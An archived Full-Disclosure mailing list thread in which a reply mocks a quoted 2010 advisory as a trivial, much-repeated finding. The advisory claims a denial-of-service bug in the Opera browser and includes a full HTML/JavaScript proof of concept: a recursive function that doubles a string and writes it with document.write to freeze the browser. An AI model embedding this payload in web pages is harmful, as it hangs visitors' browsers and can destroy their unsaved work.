lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Wed, 3 Mar 2010 22:05:22 +1100
From: Jeff Williams <jeffwillis30@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Opera (plenitude String )Denial of Service
	Exploit

You get a life.

Fixed.


2010/3/3 information security <informationhacker08@...il.com>

> Thanks .Jeff for all your comment
> so how to fix that
>
>
> On Tue, Mar 2, 2010 at 8:42 PM, Jeff Williams <jeffwillis30@...il.com>wrote:
>
>> You gotta be joking, this is probably the 3000th DoS "advisory" for
>> document.write.
>>
>> Guess what sparky, even Jeremy Brown didn't post that one.
>>
>> Thus no surprise exploit-db post this kind of shit.
>>
>>
>> 2010/3/3 information security <informationhacker08@...il.com>
>>
>>> ======================================================================
>>>
>>>
>>>                       Opera (plenitude String )Denial of Service Exploit
>>>                      =======================================================================
>>>
>>>
>>>
>>>                                                      by
>>>
>>>                                             Asheesh Kumar Mani Tripathi
>>>
>>>
>>> # code by Asheesh kumar Mani Tripathi
>>>
>>> # email informationhacker08@...il.com
>>>
>>>
>>>
>>> # company       www.aksitservices.co.in
>>>
>>> # Credit by Asheesh Anaconda
>>>
>>>
>>> #Download http://www.opera.com/download/
>>>
>>>
>>>
>>>
>>> #Background
>>>
>>> Opera is a popular internet browser :)
>>>
>>> #Vulnerability
>>> This bug is a typical result when attacker try to write plenitude String in
>>> document.write() function .User interaction is required to
>>>
>>>
>>>
>>> exploit this vulnerability in that the target must visit a malicious
>>> web page.
>>>
>>>
>>>
>>> #Impact
>>> Browser doesn't respond any longer to any user input, all tabs are no
>>> longer accessible, your work if any   might be lost.
>>>
>>>
>>>
>>>
>>>
>>> #Proof of concept
>>> copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
>>>
>>> ========================================================================================================================
>>>
>>>
>>>
>>>                                                            asheesh.html
>>> ========================================================================================================================
>>>
>>> <html>
>>>
>>>
>>>
>>> <title>asheesh kumar mani tripathi</title>
>>> Asheesh kumar Mani Tripathi
>>> <head>
>>>
>>> <script>
>>> 	
>>> 	
>>> 	
>>> function asheesh ()
>>>  {
>>> 	var	i , anaconda = "XXXX"
>>> 	for(i=24;i >0 ;--i)
>>>
>>>
>>>
>>>  {
>>> 		anaconda=anaconda+anaconda;
>>> 	}
>>>
>>>     document.write(anaconda);
>>>
>>>   asheesh();
>>>
>>> }
>>> asheesh();
>>>
>>> </script>
>>> </head>
>>>
>>> <body onLoad="asheesh()"></body>
>>>
>>>
>>>
>>> </html>
>>>
>>>
>>>
>>> ========================================================================================================================
>>> Why do you worry without cause? Whom do you fear without reason? Who can kill you?
>>>
>>>
>>>
>>> The soul is neither born, nor does it die.
>>>
>>>
>>> #If you have any questions, comments, or concerns, feel free to contact me.
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists